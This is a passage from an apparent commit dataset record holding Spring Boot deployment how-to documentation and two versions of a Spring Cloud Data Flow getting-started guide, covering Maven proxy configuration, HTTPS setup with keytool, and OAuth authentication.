-->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. 
See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml` (see the\nsketch after this list).\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\n
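As a minimal sketch of the first case, the following bean registers a legacy servlet\n(`LegacyServlet` is a hypothetical servlet class, not part of this guide):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletRegistrationBean<LegacyServlet> legacyServlet() {\n\t\t\/\/ Equivalent to a <servlet\/> plus <servlet-mapping\/> entry in web.xml\n\t\treturn new ServletRegistrationBean<>(new LegacyServlet(), \"\/legacy\/*\");\n\t}\n----\n\n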
Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is available both to the\n`SpringBootServletInitializer` callback and to the `main` method, in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`), then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. 
In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. 
Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle (the module name matches the `lettuce-core` artifact excluded in the Maven example above):\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce-core\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55bd16482edbe3b7a179097c812af4bb348bd6d4","subject":"Add doc for maven repository config","message":"Add doc for maven repository config\n\nThis resolves #735\n","repos":"jvalkeal\/spring-cloud-dataflow,markfisher\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,sabbyanandan\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,mminella\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,mbogoevici\/spring-cloud-data,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-data,mbogoevici\/spring-cloud-data","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. 
You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better; we recommend Java 8), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` dataflow server by default uses an embedded H2 database for this.\n\nYou also need to have link:http:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required to run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed. The local server registers sources, sinks, processors and tasks that are published from the link:https:\/\/github.com\/spring-cloud\/spring-cloud-stream-app-starters[Spring Cloud Stream App Starters] and link:https:\/\/github.com\/spring-cloud\/spring-cloud-task-app-starters[Spring Cloud Task App Starters] repository. By default, the server registers the applications that use Kafka, but setting the property `binding` to `rabbit` will register a list of applications that use RabbitMQ as the message broker.\n\n[[enable-disable-specific-features]]\n== Controlling features with Dataflow server\n\nThe Dataflow server offers a specific set of features that can be enabled\/disabled when launching. These features include all the lifecycle operations and REST endpoints (server, client implementations including Shell and the UI) for:\n\n. Streams\n. Tasks\n. Analytics\n\nOne can enable or disable these features by setting the following boolean properties when launching the dataflow server:\n\n* `spring.cloud.dataflow.features.streams-enabled`\n* `spring.cloud.dataflow.features.tasks-enabled`\n* `spring.cloud.dataflow.features.analytics-enabled`\n\nBy default, all these features are enabled for the `local` dataflow server.\n\nThe REST endpoint `\/features` provides information on the features enabled\/disabled.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Deploying Spring Cloud Data Flow\n\n=== Deploying 'local'\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\n.. Since the Data Flow Server is a Spring Boot application, you can run it just by using `java -jar`.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n.. Running with Custom Maven Settings and\/or Behind a Proxy\nIf you want to override specific maven configuration properties (remote repositories, etc.) and\/or run the Data Flow Server behind a proxy,\nyou need to specify those properties as command line arguments when starting the Data Flow Server.
For example:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --maven.localRepository=mylocal\n--maven.remote-repositories.repo1.url=https:\/\/repo1\n--maven.remote-repositories.repo1.auth.username=user1\n--maven.remote-repositories.repo1.auth.password=pass1\n--maven.remote-repositories.repo2.url=https:\/\/repo2 --maven.proxy.host=proxy1\n--maven.proxy.port=9010 --maven.proxy.auth.username=proxyuser1\n--maven.proxy.auth.password=proxypass1\n----\n+\nBy default, the protocol is set to `http`. You can omit the auth properties if the proxy doesn't need a username and password.\n+\nBy default, the maven `localRepository` is set to `${user.home}\/.m2\/repository\/`,\nand `https:\/\/repo.spring.io\/libs-snapshot` will be the only remote repository. As in the above example, the remote\nrepositories can be specified along with their authentication (if needed). If the remote repositories are behind a proxy,\nthen the proxy properties can be specified as above.\n+\nIf you want to pass these properties as environment properties, then you need to use `SPRING_APPLICATION_JSON` to set\nthese properties and pass `SPRING_APPLICATION_JSON` as an environment variable, as shown below:\n+\n[source,bash]\n----\n$ SPRING_APPLICATION_JSON='{ \"maven\": { \"local-repository\": null,\n\"remote-repositories\": { \"repo1\": { \"url\": \"https:\/\/repo1\", \"auth\": { \"username\": \"repo1user\", \"password\": \"repo1pass\" } }, \"repo2\": { \"url\": \"https:\/\/repo2\" } },\n\"proxy\": { \"host\": \"proxyhost\", \"port\": 9018, \"auth\": { \"username\": \"proxyuser\", \"password\": \"proxypass\" } } } }' java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n. Launch the shell:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server:\n+\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/dataflow-server.cfapps.io\nSuccessfully targeted http:\/\/dataflow-server.cfapps.io\ndataflow:>\n----\n+\nBy default, the application registry will be empty. If you would like to register all out-of-the-box stream applications built with the Kafka binder in bulk, you can do so with the following command. For more details, review how to <<streams.adoc#spring-cloud-dataflow-register-apps, register applications>>.\n+\n[source,bash,subs=attributes]\n----\ndataflow:>app import --uri http:\/\/bit.ly\/stream-applications-kafka-maven\n----\n+\n. You can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----
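+\nTo confirm what was created, you can list the stream definitions and their deployment status from the same shell session, for example:\n+\n[source,bash]\n----\ndataflow:> stream list\n----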
+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\n[TIP]\n====\nIn case you encounter unexpected errors when executing shell commands, you can\nretrieve more detailed error information by setting the exception logging level\nto `WARNING` in `logback.xml`:\n\n[source,xml]\n----\n<logger name=\"org.springframework.shell.core.JLineShellComponent.exceptions\" level=\"WARNING\"\/>\n----\n\n====\n\n[[getting-started-security]]\n== Security\n\nBy default, the Data Flow server is unsecured and runs on an unencrypted HTTP connection.\nYou can secure your REST endpoints, as well as the Data Flow Dashboard, by enabling HTTPS\nand requiring clients to authenticate.\n\n[[getting-started-security-enabling-https]]\n=== Enabling HTTPS\n\nBy default, the dashboard, management, and health endpoints use HTTP as a transport.\nYou can switch to HTTPS easily by adding a certificate to your configuration in\n`application.yml`.\n\n[source,yaml]\n----\nserver:\n port: 8443 # <1>\n ssl:\n key-alias: yourKeyAlias # <2>\n key-store: path\/to\/keystore # <3>\n key-store-password: yourKeyStorePassword # <4>\n key-password: yourKeyPassword # <5>\n trust-store: path\/to\/trust-store # <6>\n trust-store-password: yourTrustStorePassword # <7>\n----\n\n<1> As the default port is `9393`, you may choose to change the port to a more common HTTPS port.\n<2> The alias (or name) under which the key is stored in the keystore.\n<3> The path to the keystore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/keystore`\n<4> The password of the keystore.\n<5> The password of the key.\n<6> The path to the truststore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/trust-store`\n<7> The password of the trust store.\n\nNOTE: If HTTPS is enabled, it will completely replace HTTP as the protocol over\nwhich the REST endpoints and the Data Flow Dashboard interact. Plain HTTP requests\nwill fail - therefore, make sure that you configure your Shell accordingly.\n\n==== Using Self-Signed Certificates\n\nFor testing purposes or during development it might be convenient to create self-signed certificates.\nTo get started, execute the following command to create a certificate:\n\n[source,bash]\n----\n$ keytool -genkey -alias dataflow -keyalg RSA -keystore dataflow.keystore \\\n -validity 3650 -storetype JKS \\\n -keypass dataflow -storepass dataflow \\\n -dname \"CN=localhost, OU=Spring, O=Pivotal, L=Kailua-Kona, ST=HI, C=US\" # <1>\n----\n\n<1> _CN_ is the only important parameter here. It should match the domain you are trying to access, e.g. `localhost`.\n\nThen add the following to your `application.yml` file:\n\n[source,yaml]\n----\nserver:\n port: 8443\n ssl:\n enabled: true\n key-alias: dataflow\n key-store: \"\/your\/path\/to\/dataflow.keystore\"\n key-store-type: jks\n key-store-password: dataflow\n key-password: dataflow\n----\n\nThis is all that's needed for the Data Flow Server. Once you start the server,\nyou should be able to access it via https:\/\/localhost:8443\/[https:\/\/localhost:8443\/]. As this is a self-signed\ncertificate, you will hit a warning in your browser, which you need to ignore.\n
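You can also verify the endpoint from the command line. The `-k` flag below tells curl to accept the self-signed certificate and is only appropriate for this kind of local testing:\n\n[source,bash]\n----\n$ curl -k https:\/\/localhost:8443\/\n----\n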
This issue is also relevant for the Data Flow Shell. Therefore, additional steps are\nnecessary to make the Shell work with self-signed certificates. First, we need to\nexport the previously created certificate from the keystore:\n\n[source,bash]\n----\n$ keytool -export -alias dataflow -keystore dataflow.keystore -file dataflow_cert -storepass dataflow\n----\n\nNext, we need to create a truststore which the Shell will use:\n\n[source,bash]\n----\n$ keytool -importcert -keystore dataflow.truststore -alias dataflow -storepass dataflow -file dataflow_cert -noprompt\n----\n\nNow, you are ready to launch the Data Flow Shell using the following JVM arguments:\n\n[source,bash,subs=attributes]\n----\n$ java -Djavax.net.ssl.trustStorePassword=dataflow \\\n -Djavax.net.ssl.trustStore=\/path\/to\/dataflow.truststore \\\n -Djavax.net.ssl.trustStoreType=jks \\\n -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n\n[TIP]\n====\nIn case you run into trouble establishing a connection via SSL, you can enable additional\nlogging by setting the `javax.net.debug` JVM argument to `ssl`.\n====\n\nDon't forget to target the Data Flow Server with:\n\n[source,bash]\n----\ndataflow:> dataflow config server https:\/\/localhost:8443\/\n----\n\n[[getting-started-security-enabling-authentication]]\n=== Enabling Authentication\n\nBy default, the REST endpoints (administration, management and health), as well\nas the Dashboard UI do not require authenticated access. However, authentication can\nbe provided via http:\/\/oauth.net\/2\/[OAuth 2.0], thus allowing you to also integrate Spring Cloud\nData Flow into Single Sign On (SSO) environments. The following two OAuth2 Grant Types will be used:\n\n* _Authorization Code_ - Used for the GUI (Browser) integration. You will be redirected to your OAuth Service for authentication\n* _Password_ - Used by the shell (and the REST integration), so you can log in using username and password\n\nThe REST endpoints are secured via Basic Authentication but will use the Password\nGrant Type under the covers to authenticate with your OAuth2 service.\n\nNOTE: When authentication is set up, it is strongly recommended to enable HTTPS\nas well, especially in production environments.\n\nYou can turn on authentication by adding the following to `application.yml` or via\nenvironment variables:\n\n[source,yaml]\n----\nsecurity:\n basic:\n enabled: true # <1>\n realm: Spring Cloud Data Flow # <2>\n oauth2: # <3>\n client:\n client-id: myclient\n client-secret: mysecret\n access-token-uri: http:\/\/127.0.0.1:9999\/oauth\/token\n user-authorization-uri: http:\/\/127.0.0.1:9999\/oauth\/authorize\n resource:\n user-info-uri: http:\/\/127.0.0.1:9999\/me\n----\n\n<1> Must be set to `true` for security to be enabled.\n<2> The realm for Basic authentication\n<3> OAuth Configuration Section\n\nNOTE: As of version 1.0, Spring Cloud Data Flow does not provide finer-grained authorization.
Thus, once you are logged in, you have full access to all functionality.\n\nYou can verify that basic authentication is working properly using _curl_:\n\n[source,bash]\n----\n$ curl -u myusername:mypassword http:\/\/localhost:9393\/\n----\n\nAs a result you should see a list of available REST endpoints.\n\n[[getting-started-security-enabling-authentication-cloud-foundry]]\n==== Authentication and Cloud Foundry\n\nWhen deploying Spring Cloud Data Flow to Cloud Foundry, we take advantage of the\nhttps:\/\/github.com\/pivotal-cf\/spring-cloud-sso-connector[_Spring Cloud Single Sign-On Connector_],\nwhich provides Cloud Foundry specific auto-configuration support for OAuth 2.0\nwhen used in conjunction with the _Pivotal Single Sign-On Service_.\n\nSimply set `security.basic.enabled` to `true` and in Cloud Foundry bind the SSO\nservice to your Data Flow Server app and SSO will be enabled.\n\n","old_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` dataflow server by default uses embedded H2 database for this.\n\nYou also need to have link:http:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed. The local server registers sources, sink, processors and tasks the are published from the link:https:\/\/github.com\/spring-cloud\/spring-cloud-stream-app-starters[Spring Cloud Stream App Starters] and link:https:\/\/github.com\/spring-cloud\/spring-cloud-task-app-starters[Spring Cloud Task App Starters] repository. By default the server registers these applications that use Kafka, but setting the property `binding` to `rabbit` will register a list of applications that use RabbitMQ as the message broker.\n\n[[enable-disable-specific-features]]\n== Controlling features with Dataflow server\n\nDataflow server offers specific set of features that can be enabled\/disabled when launching. These features include all the lifecycle operations, REST endpoints (server, client implementations including Shell and the UI) for:\n\n. Streams\n. Tasks\n. Analytics\n\nOne can enable, disable these features by setting the following boolean properties when launching the dataflow server:\n\n* `spring.cloud.dataflow.features.streams-enabled`\n* `spring.cloud.dataflow.features.tasks-enabled`\n* `spring.cloud.dataflow.features.analytics-enabled`\n\nBy default, all these features are enabled for `local` dataflow server.\n\nThe REST endpoint `\/features` provides information on the features enabled\/disabled.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Deploying Spring Cloud Data Flow\n\n=== Deploying 'local'\n. 
Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\n.. Since the Data Flow Server is a Spring Boot application, you can run it just by using `java -jar`.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n.. Running with Custom Maven Settings and\/or Behind a Proxy\nIf you want to override specific maven configuration properties (remote repositories, etc.) and\/or run the Data Flow Server behind a proxy,\nyou need to specify those properties as command line arguments when starting the Data Flow Server. For example:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --maven.localRepository=mylocal --maven.remoteRepositories=repo1,repo2 --maven.offline=true\n--maven.proxy.protocol=https --maven.proxy.host=host1 --maven.proxy.port=8090 --maven.proxy.non_proxy_hosts='host2|host3' --maven.proxy.auth.username=user1 --maven.proxy.auth.password=passwd\n----\n+\nBy default, the protocol is set to `http`. You can omit the auth properties if the proxy doesn't need a username and password.\n+\nBy default, the maven `localRepository` is set to `${user.home}\/.m2\/repository\/`,\nand `https:\/\/repo.spring.io\/libs-snapshot` will be the only remote repository.\n+\nYou can also use environment variables to specify the maven\/proxy properties:\n+\n[source,bash]\n----\nexport MAVEN_LOCAL_REPOSITORY=mylocalMavenRepo\nexport MAVEN_REMOTE_REPOSITORIES=repo1,repo2\nexport MAVEN_OFFLINE=true\nexport MAVEN_PROXY_PROTOCOL=https\nexport MAVEN_PROXY_HOST=host1\nexport MAVEN_PROXY_PORT=8090\nexport MAVEN_PROXY_NON_PROXY_HOSTS='host2|host3'\nexport MAVEN_PROXY_AUTH_USERNAME=user1\nexport MAVEN_PROXY_AUTH_PASSWORD=passwd\n----\n+\n. Launch the shell:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server:\n+\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/dataflow-server.cfapps.io\nSuccessfully targeted http:\/\/dataflow-server.cfapps.io\ndataflow:>\n----\n+\nBy default, the application registry will be empty. If you would like to register all out-of-the-box stream applications built with the Kafka binder in bulk, you can with the following command. For more details, review how to <<streams.adoc#spring-cloud-dataflow-register-apps, register applications>>.\n+\n[source,bash,subs=attributes]\n----\n$ dataflow:>app import --uri http:\/\/bit.ly\/stream-applications-kafka-maven\n----\n+\n. You can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. 
Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\n[TIP]\n====\nIn case you encounter unexpected errors when executing shell commands, you can\nretrieve more detailed error information by setting the exception logging level\nto `WARNING` in `logback.xml`:\n\n[source,xml]\n----\n<logger name=\"org.springframework.shell.core.JLineShellComponent.exceptions\" level=\"WARNING\"\/>\n----\n\n====\n\n[[getting-started-security]]\n== Security\n\nBy default, the Data Flow server is unsecured and runs on an unencrypted HTTP connection.\nYou can secure your REST endpoints, as well as the Data Flow Dashboard by enabling HTTPS\nand requiring clients to authenticate.\n\n[[getting-started-security-enabling-https]]\n=== Enabling HTTPS\n\nBy default, the dashboard, management, and health endpoints use HTTP as a transport.\nYou can switch to HTTPS easily, by adding a certificate to your configuration in\n`application.yml`.\n\n[source,yaml]\n----\nserver:\n port: 8443 # <1>\n ssl:\n key-alias: yourKeyAlias # <2>\n key-store: path\/to\/keystore # <3>\n key-store-password: yourKeyStorePassword # <4>\n key-password: yourKeyPassword # <5>\n trust-store: path\/to\/trust-store # <6>\n trust-store-password: yourTrustStorePassword # <7>\n----\n\n<1> As the default port is 